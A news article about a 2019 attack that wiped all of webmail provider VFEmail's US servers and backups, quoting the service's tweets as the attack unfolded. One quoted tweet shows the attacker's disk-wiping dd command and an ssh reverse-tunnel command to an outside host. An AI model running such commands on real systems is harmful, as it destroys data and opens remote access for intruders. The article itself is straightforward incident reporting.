Ever used VFEmail? No? Well, chances are you never will now: Hackers wipe servers, backups in 'catastrophic' attack
The 'VF' now stands for 'virtually f*cked'
A hacker wiped every server and backup of VFEmail this week in a "catastrophic" attack, according to the webmail service.
VFEmail admins detailed the network intrusion on Monday in a grim red-letter update on the site's front page. The service's founder Rick Romero also said it's likely the webmail outfit is toast as a result of the ransacking:
Yes, @VFEmail is effectively gone. It will likely not return.— Havokmon (@Havokmon) February 12, 2019
I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.
While the website is once again up and running for paid users, it appears that, at least for all US customers, all their inboxes are empty, cleared out by one or more miscreants. "We have suffered catastrophic destruction at the hands of a hacker," the site's admins said. "This person has destroyed all data in the US, both primary and backup systems."
Netizens who log in now will be able to send and receive mails, though all their old and archived messages are gone, as are any custom filters put in place to catch malware and spam. Free accounts remain unable to send email.
This is particularly bad, as the ability to scan messages for junk and software nasties was a key selling point of the service, which was set up in response to the ILoveYou virus that spread via email in 2001.
The tragedy unfolded on VFEmail's Twitter feed as admins provided real-time updates on the disaster over the course of a day:
This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.— VFEmail.net (@VFEmail) February 11, 2019
Caught the perp in the middle of formatting the backup server:— VFEmail.net (@VFEmail) February 11, 2019
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null firstname.lastname@example.org -R 127.0.0.1:30081:127.0.0.1:22 -N
Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.— VFEmail.net (@VFEmail) February 11, 2019
Interestingly, as VFEmail noted, there was no indication that the hacker had warned or contacted the site for any sort of ransom or demand before the attack happened, suggesting the point all along was to completely wipe out the webmail service.
We've asked VFEmail for more details, and will share them when/if they come in. ®